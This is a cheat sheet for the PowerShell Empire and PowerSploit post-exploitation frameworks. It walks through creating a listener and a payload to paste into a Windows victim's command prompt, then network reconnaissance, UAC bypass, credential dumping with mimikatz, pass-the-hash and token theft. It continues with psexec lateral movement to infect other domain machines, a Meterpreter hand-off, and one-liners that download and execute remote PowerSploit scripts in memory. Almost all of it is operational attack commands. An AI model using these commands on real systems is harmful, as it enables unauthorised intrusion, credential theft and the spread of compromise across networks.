
Powershell Empire Cheat Sheet by fred

powershell     hacking     empire

Resources

Official Site - http://www.powershellempire.com

In-depth Tutorial + Word/Excel Macro Example -
https://www.youtube.com/watch?v=aDeJBe6eqps

~39:30 - BSides DC 2015 - Bridging the Gap: Lessons in Adversarial Tradecraft
https://www.youtube.com/watch?v=xHkRhRo3l8o

Offensive Active Directory with Powershell
https://www.youtube.com/watch?v=cXWtu-qalSs

Installation

git clone https://github.com/powershellempire/empire
sudo apt-get install python-pip python-openssl
cd empire
cd setup
sudo ./install.sh

Execution & Exploitation

Create listener and generate Base64 cmd payload
sudo ./empire
listeners
set Name listenername
execute
usestager launcher listenername
execute (generates the payload; copy & paste it into cmd on the Windows victim)
agents

Note: Type in usestager then hit TAB twice for more options.

Post Exploitation

agents
interact AGENTNAME
sysinfo
usemodule situational_awareness/network/arpscan
set Range 10.0.0.0-10.0.0.255
execute
...
usemodule situational_awareness/network/reverse_dns
set Range 10.0.0.0-10.0.0.255
execute
...
usemodule situational_awareness/network/powerview/user_hunter
execute
...
usemodule situational_awareness/network/powerview/share_finder
set CheckShareAccess True
execute
...
agents
interact AGENTNAME
bypassuac LISTENERNAME
y
...wait for the new agent to appear as active...
agents (look for a user marked with *, which indicates admin)
interact AGENTNAME
mimikatz (collect creds, etc.)
creds
dir \\COMPUTERNAME\C$
creds
pth 1 (pass-the-hash using cred 1; a PID will be created)
steal_token PIDNUM
dir \\COMPUTERNAME\C$
 

Lateral Movement

usemodule situational_awareness/network/powerview/find_localadmin_access
info
execute (computer names vulnerable to psexec will appear)
usemodule lateral_movement/invoke_psexec
info
set Listener test1
set ComputerName WIN10COMP.blah.com (machine to attack)
info
execute

You can repeat the above process to infect other computers on the domain.

Connect to a Meterpreter Multi-Handler

Start your meterpreter multi-handler, then do the following:

interact NAME (target name from the 'agents' menu)
usemodule code_execution/invoke_shellcode
info
set lhost IPADDRESS (the IP in your multi-handler session)
set lport PORT (the port in your multi-handler session)
execute (wait...)
(a meterpreter session will appear in metasploit)

Powersploit

Source - https://github.com/PowerShellMafia/PowerSploit/

Demos
User Hunting - https://www.sixdub.net/?p=591

Reverse meterpreter shell - DLL Injection using PowerSploit and Metasploit
https://www.youtube.com/watch?v=yKoD5Oy8CKQ

PowerShell Toolkit: PowerSploit - Gaining Shells Without Writing To Disk
https://www.youtube.com/watch?v=LEll6qa-REY

Powersploit Example

cmd
powershell
IEX (New-Object Net.WebClient).DownloadString("https://github.com/PowerShellMafia/PowerSploit/raw/master/CodeExecution/Invoke-Shellcode.ps1")

Powersploit Priv Esc

cmd
powershell
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1")
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Privesc.psd1")
Invoke-AllChecks
